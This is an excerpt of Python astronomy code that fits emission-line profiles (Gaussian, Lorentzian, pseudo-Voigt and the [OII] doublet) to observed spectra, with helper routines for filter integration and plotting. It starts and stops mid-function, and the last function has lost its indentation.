toInt=interp1d(wl,spec1d*filtTp)
Lg=quad(toInt,xmin,xmax,limit=500000)[0]
toInt=interp1d(wl,(spec1d+err1d)*filtTp)
LgU=quad(toInt,xmin,xmax,limit=500000)[0]
toInt=interp1d(wl,(spec1d-err1d)*filtTp)
LgL=quad(toInt,xmin,xmax,limit=500000)[0]
return Lfilt, Lspec, Lg, LgU, LgL
def getFractionObsMed(self, mag, lambdaMag, fl, flErr):
    """
    Computes the fraction of light captured by the spectrograph in a broad
    band, by comparing the median observed flux to the broad-band magnitude
    converted to flux at the band's mean wavelength.
    :param mag: magnitude AB (float, mag)
    :param lambdaMag: mean wavelength covered by the magnitude AB (float, Angstrom)
    :param fl: flux observed in the broad band (array, f lambda)
    :param flErr: error on the flux observed in the broad band (array, f lambda)
    Returns :
        * fraction of light observed
        * error on the fraction of light observed
    """
    # flux the spectrum should reach according to the magnitude
    target_flux = self.flambda(mag, lambdaMag)
    fraction = target_flux / n.median(fl)
    fraction_err = target_flux / n.median(flErr)
    return fraction, fraction_err
def getFractionObsMag(self, mag, lambdaMag, filter, xmin, xmax, wl, fl, flErr):
    """
    Computes the fraction of light captured by the spectrograph in a broad
    band, by comparing the filter-weighted integral of the observed flux to
    the broad-band magnitude converted to flux.
    :param mag: magnitude AB (float, mag)
    :param lambdaMag: mean wavelength covered by the magnitude AB (float, Angstrom)
    :param filter: filter curve (interpolation 1d)
    :param xmin: lower integration boundary (Angstrom)
    :param xmax: higher integration boundary (Angstrom)
    :param wl: wavelength (array, Angstrom)
    :param fl: flux observed in the broad band (array, f lambda)
    :param flErr: error on the flux observed in the broad band (array, f lambda)
    Returns :
        * fraction of light observed
        * error on the fraction of light observed
    """
    goal = self.flambda(mag, lambdaMag)
    Lfilt, Lspec, Lg, LgU, LgL = self.integrateMAG(wl, fl, flErr, filter, xmin, xmax)
    # normalize the filter-weighted integrals by filter area and target flux
    norm = Lfilt * goal
    fraction = Lg / norm
    # half the spread between the +err and -err integrals
    fraction_err = (LgU - LgL) / norm / 2.
    return fraction, fraction_err
def plotLineFit(self, wl, fl, flErr, lineModel, a0, datI, path_to_fig="plot.pdf", title=" - ", fitWidth=70., DLC=50, doublet=False):
    """
    Plots a spectrum together with the fitted emission-line model.
    :param wl: wavelength (array, Angstrom)
    :param fl: flux observed in the broad band (array, f lambda)
    :param flErr: error on the observed flux (array, f lambda)
    :param lineModel: model output by the line fitting functions (array, (2,N): wavelength and flux)
    :param a0: position of the peak of the line
    :param datI: parameter vector from the fitting routine; its layout depends on *doublet*
    :param path_to_fig: where you wish to save the figure (saving currently disabled)
    :param title: figure title
    :param fitWidth: width of the fitting window (Angstrom)
    :param DLC: extent of the continuum window on each side (Angstrom)
    :param doublet: True when datI comes from a doublet fit
    """
    half = fitWidth / 2.
    p.figure(0, (8, 4))
    # data and its +/- error envelope
    p.plot(wl, fl, 'k')
    p.plot(wl, fl + flErr, 'g--')
    p.plot(wl, fl - flErr, 'g--')
    # mark the line centre and the fit / continuum window edges
    for edge in (a0, a0 - half, a0 - half - DLC, a0 + half, a0 + half + DLC):
        p.axvline(edge, c='k')
    p.plot(lineModel[0], lineModel[1], 'r')
    p.xlim((a0 - half - DLC - 5, a0 + half + DLC + 5))
    p.yscale('log')
    p.ylim((n.max([lineModel[1].min() / 5., 1e-18]), lineModel[1].max() * 5.))
    x_model = n.arange(a0 - half - DLC, a0 + half + DLC, 0.1)
    if doublet:
        a0_0, a0_1, flux, fluxErr, sigma, sigmaErr, continu, continuErr, EW, share, shareErr, fd_a0_l, fd_a0_r, chi2, ndof = datI
        # each doublet component sits on half of the continuum level
        component_1 = continu / 2. + self.gaussianLineNC(x_model, sigma, share * flux, a0_1)
        component_2 = continu / 2. + self.gaussianLineNC(x_model, sigma, (1 - share) * flux, a0_0)
        p.title(title + " doublet")
        p.plot(x_model, component_1, 'c', ls='dashed', lw=2)
        p.plot(x_model, component_2, 'm', ls='dotted', lw=2)
    else:
        a0, flux, fluxErr, sigma, sigmaErr, continu, continuErr, EW, fd_a0_l, fd_a0_r, chi2, ndof = datI
        y_model = self.gaussianLine(x_model, sigma, flux, a0, continu)
        p.title(title)
        p.plot(x_model, y_model, 'm--')
    # p.savefig(path_to_fig)  # saving disabled in the original code
    p.show()
def fit_Line_position_C0noise(self,wl,spec1d,err1d,a0=5007.,lineName="AL",fitWidth=20,DLC=20, p0_sigma=15.,p0_flux=8e-17,p0_share=0.5,continuumSide="left",model="gaussian"):
    """
    Fits a line profile to a spectrum where the noise model is a constant
    set to the continuum level (instead of the per-pixel error err1d).
    :param wl: wavelength (array, Angstrom)
    :param spec1d: flux observed in the broad band (array, f lambda)
    :param err1d: error on the flux observed in the broad band (array, f lambda)
    :param a0: expected position of the peak of the line in the observed frame (redshifted). a0 is fitted.
    :param lineName: suffix characterizing the line in the headers of the output
    :param fitWidth: width in Angstrom around the line where the fit is performed (def: 20 Angstrom)
    :param DLC: wavelength extent to fit the continuum around the line (def: 20 Angstrom)
    :param p0_sigma: prior on the line width in A (def: 15 A)
    :param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
    :param p0_share: prior on the share of Gaussian and Lorentzian model. Only used with the pseudoVoigt profile (def: 0.5, no units)
    :param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
    :param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt".
    Returns :
        * array 1 with the parameters of the model
        * array 2 with the model (wavelength, flux model)
        * header corresponding to the array 1
    Returns None when continuumSide or model is not one of the supported values.
    """
    # column headers of the two output layouts (pseudo-Voigt adds share, shareErr)
    header=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
    headerPV=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
    # "no fit" fallbacks filled with the default value self.dV
    outPutNF=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
    outPutNF_PV=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
    modNF=n.array([self.dV,self.dV])
    isPV=(model=="pseudoVoigt")
    # fit window around the line; continuum window on the requested side.
    # (Previously the whole procedure was duplicated for "left" and "right";
    # only the continuum window differed.)
    domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
    if continuumSide=="left":
        domainCont=(wl>a0-DLC-fitWidth)&(wl<a0-fitWidth)
    elif continuumSide=="right":
        domainCont=(wl>a0+fitWidth)&(wl<a0+DLC+fitWidth)
    else:
        return None
    # need both windows inside the wavelength coverage, with at least 3 pixels each
    if not (a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2):
        # not enough spectral coverage to fit the line
        if model=="gaussian" or model=="lorentz":
            return outPutNF,modNF,header
        if isPV:
            return outPutNF_PV,modNF,headerPV
        return None
    # continuum level and error: medians over the continuum window
    continu=n.median(spec1d[domainCont])
    continuErr=n.median(err1d[domainCont])
    # profile to fit; the line position a0 and the continuum are free parameters
    if model=="gaussian":
        flMod=lambda aa,sigma,F0,a0,continu : self.gaussianLine(aa,sigma,F0,a0,continu)
        p0=n.array([p0_sigma,p0_flux,a0,continu])
    elif model=="lorentz":
        flMod=lambda aa,sigma,F0,a0,continu : self.lorentzLine(aa,sigma,F0,a0,continu)
        p0=n.array([p0_sigma,p0_flux,a0,continu])
    elif isPV:
        flMod=lambda aa,sigma,F0,sh,a0,continu : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
        p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
    else:
        # unsupported model name (the original code raised NameError here)
        return None
    # flux density just red/bluewards of the expected line centre
    interp=interp1d(wl,spec1d)
    fd_a0_r=interp(a0+0.2)
    fd_a0_l=interp(a0-0.2)
    # failure payload: measured continuum, defaults elsewhere
    if isPV:
        noFit=n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
    else:
        noFit=n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
    # only fit when the spectrum actually peaks above the continuum on both sides of a0
    if not (fd_a0_r>continu and fd_a0_l>continu):
        return noFit
    # constant noise at the continuum level: the defining feature of this variant
    var=continu*n.ones_like(err1d[domainLine])
    out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0, sigma=var, maxfev=1000000000, gtol=1.49012e-8)
    # curve_fit returns an ndarray covariance only when the fit converged
    if out[1].__class__!=n.ndarray:
        return noFit
    popt,pcov=out
    model1=flMod(wl[domainLine],*popt)
    chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
    ndof=len(var)
    # best-fit parameters and 1-sigma errors from the covariance diagonal
    sigma=popt[0]
    sigmaErr=pcov[0][0]**0.5
    flux=popt[1]
    fluxErr=pcov[1][1]**0.5
    mod=n.array([wl[domainLine],model1])
    if isPV:
        share=popt[2]
        shareErr=pcov[2][2]**0.5
        a0=popt[3]
        continu=popt[4]
        continuErr=pcov[4][4]**0.5
        EW=flux/continu  # equivalent-width proxy: line flux over continuum
        outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
        return outPut,mod,headerPV
    a0=popt[2]
    continu=popt[3]
    continuErr=pcov[3][3]**0.5
    EW=flux/continu  # equivalent-width proxy: line flux over continuum
    outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
    return outPut,mod,header
def fit_Line_position(self,wl,spec1d,err1d,a0=5007.,lineName="AL",fitWidth=20,DLC=20, p0_sigma=15.,p0_flux=8e-17,p0_share=0.5,continuumSide="left",model="gaussian"):
    """
    Fits a line profile to a spectrum, using the per-pixel errors err1d as
    the noise model. The line position a0 is a free parameter of the fit.
    :param wl: wavelength (array, Angstrom)
    :param spec1d: flux observed in the broad band (array, f lambda)
    :param err1d: error on the flux observed in the broad band (array, f lambda)
    :param a0: expected position of the peak of the line in the observed frame (redshifted). a0 is fitted.
    :param lineName: suffix characterizing the line in the headers of the output
    :param fitWidth: width in Angstrom around the line where the fit is performed (def: 20 Angstrom)
    :param DLC: wavelength extent to fit the continuum around the line (def: 20 Angstrom)
    :param p0_sigma: prior on the line width in A (def: 15 A)
    :param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
    :param p0_share: prior on the share of Gaussian and Lorentzian model. Only used with the pseudoVoigt profile (def: 0.5, no units)
    :param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
    :param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt".
    Returns :
        * array 1 with the parameters of the model
        * array 2 with the model (wavelength, flux model)
        * header corresponding to the array 1
    Returns None when continuumSide or model is not one of the supported values.
    """
    # column headers of the two output layouts (pseudo-Voigt adds share, shareErr)
    header=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
    headerPV=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
    # "no fit" fallbacks filled with the default value self.dV
    outPutNF=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
    outPutNF_PV=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
    modNF=n.array([self.dV,self.dV])
    isPV=(model=="pseudoVoigt")
    # fit window around the line; continuum window on the requested side.
    # (Previously the whole procedure was duplicated for "left" and "right";
    # only the continuum window differed.)
    domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
    if continuumSide=="left":
        domainCont=(wl>a0-DLC-fitWidth)&(wl<a0-fitWidth)
    elif continuumSide=="right":
        domainCont=(wl>a0+fitWidth)&(wl<a0+DLC+fitWidth)
    else:
        return None
    # need both windows inside the wavelength coverage, with at least 3 pixels each
    if not (a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2):
        # not enough spectral coverage to fit the line
        if model=="gaussian" or model=="lorentz":
            return outPutNF,modNF,header
        if isPV:
            return outPutNF_PV,modNF,headerPV
        return None
    # continuum level and error: medians over the continuum window
    continu=n.median(spec1d[domainCont])
    continuErr=n.median(err1d[domainCont])
    # profile to fit; the line position a0 and the continuum are free parameters
    if model=="gaussian":
        flMod=lambda aa,sigma,F0,a0,continu : self.gaussianLine(aa,sigma,F0,a0,continu)
        p0=n.array([p0_sigma,p0_flux,a0,continu])
    elif model=="lorentz":
        flMod=lambda aa,sigma,F0,a0,continu : self.lorentzLine(aa,sigma,F0,a0,continu)
        p0=n.array([p0_sigma,p0_flux,a0,continu])
    elif isPV:
        flMod=lambda aa,sigma,F0,sh,a0,continu : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
        p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
    else:
        # unsupported model name (the original code raised NameError here)
        return None
    # flux density just red/bluewards of the expected line centre
    interp=interp1d(wl,spec1d)
    fd_a0_r=interp(a0+0.2)
    fd_a0_l=interp(a0-0.2)
    # failure payload: measured continuum, defaults elsewhere
    if isPV:
        noFit=n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
    else:
        noFit=n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
    # only fit when the spectrum actually peaks above the continuum on both sides of a0
    if not (fd_a0_r>continu and fd_a0_l>continu):
        return noFit
    # noise model: the per-pixel error array inside the fit window
    var=err1d[domainLine]
    out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0, sigma=var, maxfev=1000000000, gtol=1.49012e-8)
    # curve_fit returns an ndarray covariance only when the fit converged
    if out[1].__class__!=n.ndarray:
        return noFit
    popt,pcov=out
    model1=flMod(wl[domainLine],*popt)
    chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
    ndof=len(var)
    # best-fit parameters and 1-sigma errors from the covariance diagonal
    sigma=popt[0]
    sigmaErr=pcov[0][0]**0.5
    flux=popt[1]
    fluxErr=pcov[1][1]**0.5
    mod=n.array([wl[domainLine],model1])
    if isPV:
        share=popt[2]
        shareErr=pcov[2][2]**0.5
        a0=popt[3]
        continu=popt[4]
        continuErr=pcov[4][4]**0.5
        EW=flux/continu  # equivalent-width proxy: line flux over continuum
        outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
        return outPut,mod,headerPV
    a0=popt[2]
    continu=popt[3]
    continuErr=pcov[3][3]**0.5
    EW=flux/continu  # equivalent-width proxy: line flux over continuum
    outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
    return outPut,mod,header
def fit_Line(self,wl,spec1d,err1d,a0,lineName="AL",fitWidth=20,DLC=20, p0_sigma=15.,p0_flux=8e-17,p0_share=0.5,continuumSide="left",model="gaussian"):
    """
    Fits a line profile to a spectrum around a fixed line position: a0 and
    the continuum level are held fixed, only the width/flux (and the share
    for pseudo-Voigt) are fitted.
    :param wl: wavelength (array, Angstrom)
    :param spec1d: flux observed in the broad band (array, f lambda)
    :param err1d: error on the flux observed in the broad band (array, f lambda)
    :param a0: expected position of the peak of the line in the observed frame (redshifted). a0 is not fitted, it is given.
    :param lineName: suffix characterizing the line in the headers of the output
    :param fitWidth: width in Angstrom around the line where the fit is performed (def: 20 Angstrom)
    :param DLC: wavelength extent to fit the continuum around the line (def: 20 Angstrom)
    :param p0_sigma: prior on the line width in A (def: 15 A)
    :param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
    :param p0_share: prior on the share of Gaussian and Lorentzian model. Only used with the pseudoVoigt profile (def: 0.5, no units)
    :param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
    :param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt".
    Returns :
        * array 1 with the parameters of the model
        * array 2 with the model (wavelength, flux model)
        * header corresponding to the array 1
    Returns None when continuumSide or model is not one of the supported values.
    """
    # column headers of the two output layouts (pseudo-Voigt adds share, shareErr)
    header=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
    headerPV=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
    # "no fit" fallbacks filled with the default value self.dV
    outPutNF=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
    outPutNF_PV=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
    modNF=n.array([self.dV,self.dV])
    isPV=(model=="pseudoVoigt")
    # fit window around the line; continuum window on the requested side.
    # (Previously the whole procedure was duplicated for "left" and "right";
    # only the continuum window differed.)
    domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
    if continuumSide=="left":
        domainCont=(wl>a0-DLC-fitWidth)&(wl<a0-fitWidth)
    elif continuumSide=="right":
        domainCont=(wl>a0+fitWidth)&(wl<a0+DLC+fitWidth)
    else:
        return None
    # need both windows inside the wavelength coverage, with at least 3 pixels each
    if not (a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2):
        # not enough spectral coverage to fit the line
        if model=="gaussian" or model=="lorentz":
            return outPutNF,modNF,header
        if isPV:
            return outPutNF_PV,modNF,headerPV
        return None
    # continuum level and error: medians over the continuum window
    continu=n.median(spec1d[domainCont])
    continuErr=n.median(err1d[domainCont])
    # profile to fit; a0 and the continuum are fixed through the closure
    if model=="gaussian":
        flMod=lambda aa,sigma,F0 : self.gaussianLine(aa,sigma,F0,a0,continu)
        p0=n.array([p0_sigma,p0_flux])
    elif model=="lorentz":
        flMod=lambda aa,sigma,F0 : self.lorentzLine(aa,sigma,F0,a0,continu)
        p0=n.array([p0_sigma,p0_flux])
    elif isPV:
        flMod=lambda aa,sigma,F0,sh : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
        p0=n.array([p0_sigma,p0_flux,p0_share])
    else:
        # unsupported model name (the original code raised NameError here)
        return None
    # flux density just red/bluewards of the expected line centre
    interp=interp1d(wl,spec1d)
    fd_a0_r=interp(a0+0.2)
    fd_a0_l=interp(a0-0.2)
    # failure payload: measured continuum, defaults elsewhere
    if isPV:
        noFit=n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
    else:
        noFit=n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
    # only fit when the spectrum actually peaks above the continuum on both sides of a0
    if not (fd_a0_r>continu and fd_a0_l>continu):
        return noFit
    # noise model: the per-pixel error array inside the fit window
    var=err1d[domainLine]
    out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0, sigma=var, maxfev=1000000000, gtol=1.49012e-8)
    # curve_fit returns an ndarray covariance only when the fit converged
    if out[1].__class__!=n.ndarray:
        return noFit
    popt,pcov=out
    model1=flMod(wl[domainLine],*popt)
    chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
    ndof=len(var)
    # best-fit parameters and 1-sigma errors from the covariance diagonal
    sigma=popt[0]
    sigmaErr=pcov[0][0]**0.5
    flux=popt[1]
    fluxErr=pcov[1][1]**0.5
    EW=flux/continu  # equivalent-width proxy: line flux over continuum
    mod=n.array([wl[domainLine],model1])
    if isPV:
        share=popt[2]
        shareErr=pcov[2][2]**0.5
        outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
        return outPut,mod,headerPV
    outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
    return outPut,mod,header
def fit_Line_OIIdoublet(self,wl,spec1d,err1d,a0=3726.0321735398957,lineName="OII",fitWidth=20,DLC=20,p0_sigma=4.,p0_flux=1e-16,p0_share=0.58,model="gaussian"):
    """
    Fits the [OII] doublet line profile with both component positions held fixed.
    :param wl: wavelength (array, Angstrom)
    :param spec1d: flux observed in the broad band (array, f lambda)
    :param err1d: error on the flux observed in the broad band (array, f lambda)
    :param a0: expected positions of the two doublet components in the observed frame (sequence of 2 wavelengths, Angstrom). NOTE(review): the default is a scalar, but the body indexes a0[0] and a0[1]; callers must pass a 2-element sequence — confirm and fix the default.
    :param lineName: suffix characterizing the line in the headers of the output
    :param fitWidth: width in Angstrom around the line where the fit is performed (def: 20 Angstrom)
    :param DLC: wavelength extent to fit the continuum bluewards of the doublet (def: 20 Angstrom)
    :param p0_sigma: prior on the line width in A (def: 4 A)
    :param p0_flux: prior on the total doublet flux in erg/cm2/s/A (def: 1e-16)
    :param p0_share: prior on the flux share between the two [OII] components (def: 0.58)
    :param model: "gaussian" or "lorentz". NOTE(review): any other value leaves flMod undefined (NameError when a fit is attempted); pseudoVoigt is not implemented here.
    Returns :
        * array 1 with the parameters of the model
        * array 2 with the model (wavelength, flux model)
        * header corresponding to the array 1
    """
    # column headers of the output array
    header=" "+lineName+"_a0a "+lineName+"_a0b "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
    # "no fit" fallback filled with the default value self.dV
    outPutNF=n.array([a0[0], a0[1], self.dV,self.dV, self.dV,self.dV, self.dV, self.dV,self.dV, self.dV,self.dV, self.dV,self.dV,self.dV,self.dV])
    modNF=n.array([self.dV,self.dV])
    # fit window spanning both components; continuum window bluewards of the doublet
    domainLine=(wl>a0[0]-fitWidth)&(wl<a0[1]+fitWidth)
    domainCont=(wl>a0[0]-DLC-fitWidth)&(wl<a0[0]-fitWidth)
    # need both windows covered with at least 3 pixels each
    if a0[0]<wl.max()-DLC and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
        # continuum level and error: medians over the continuum window
        continu=n.median(spec1d[domainCont])
        continuErr=n.median(err1d[domainCont])
        # doublet model: total flux F0 split between the two fixed positions,
        # fraction sh at a0[1] and (1-sh) at a0[0]
        if model=="gaussian":
            flMod=lambda aa,sigma,F0,sh :continu+ self.gaussianLineNC(aa,sigma,(1-sh)*F0,a0[0])+self.gaussianLineNC(aa,sigma,sh*F0,a0[1])
        if model=="lorentz":
            flMod=lambda aa,sigma,F0,sh : self.lorentzLine(aa,sigma,(1-sh)*F0,a0[0],continu/2.)+self.lorentzLine(aa,sigma,sh*F0,a0[1],continu/2.)
        # flux density sampled at the redder component position
        index=n.searchsorted(wl,a0[1])
        fd_a0_r=spec1d[index]
        fd_a0_l=spec1d[index]
        # NOTE(review): index is recomputed for a0[0] here but never used;
        # fd_a0_l was probably meant to sample spec1d at a0[0] — TODO confirm
        index=n.searchsorted(wl,a0[0])
        # only fit when the spectrum rises above the continuum at the doublet
        if fd_a0_r>continu or fd_a0_l>continu :
            out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=n.array([p0_sigma,p0_flux,p0_share]),sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
            # curve_fit returns an ndarray covariance only when the fit converged
            if out[1].__class__==n.ndarray :
                model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2])
                var=err1d[domainLine]
                chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
                ndof=len(var)
                # best-fit parameters and 1-sigma errors from the covariance diagonal
                sigma=out[0][0]
                sigmaErr=out[1][0][0]**0.5
                flux=out[0][1]
                fluxErr=out[1][1][1]**0.5
                share=out[0][2]
                shareErr=out[1][2][2]**0.5
                # equivalent-width proxy: total doublet flux over continuum level
                EW=flux/continu
                outPut=n.array([a0[0],a0[1],flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
                mod=n.array([wl[domainLine],model1])
                return outPut,mod,header
            else :
                # fit did not converge: keep the measured continuum, defaults elsewhere
                return n.array([a0[0],a0[1],self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
        else :
            # no flux excess above the continuum: return the continuum measurement only
            return n.array([a0[0],a0[1],self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
    else :
        # not enough spectral coverage around the doublet
        return outPutNF,modNF,header
def fit_Line_OIIdoublet_position(self,wl,spec1d,err1d,a0=3726.0321,lineName="O2_3728",fitWidth=20,DLC=20,p0_sigma=4.,p0_flux=1e-16,p0_share=0.58,model="gaussian"):
"""
fits the [OII] doublet line profile
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted). 2 positions given.
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param p0_share: prior on the share between the two [OII] lines. (def: 0.58)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
:param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt"
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0a "+lineName+"_a0b "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, a0+2.782374, self.dV,self.dV, self.dV,self.dV, self.dV, self.dV,self.dV, self.dV,self.dV, self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
domainLine=(wl>a0-fitWidth)&(wl<a0+2.782374+fitWidth/2.)
domainCont=(wl>a0-fitWidth-DLC)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,sh,a0,continu :continu+ self.gaussianLineNC(aa,sigma,(1-sh)*F0,a0)+self.gaussianLineNC(aa,sigma,sh*F0,a0+2.782374)
p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
index=n.searchsorted(wl,a0+2.782374)
fd_a0_r=spec1d[index]
index=n.searchsorted(wl,a0)
fd_a0_l=spec1d[index]
if fd_a0_r>continu or fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu]),sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
a0=out[0][3]
a0_err=out[1][3][3]**0.5
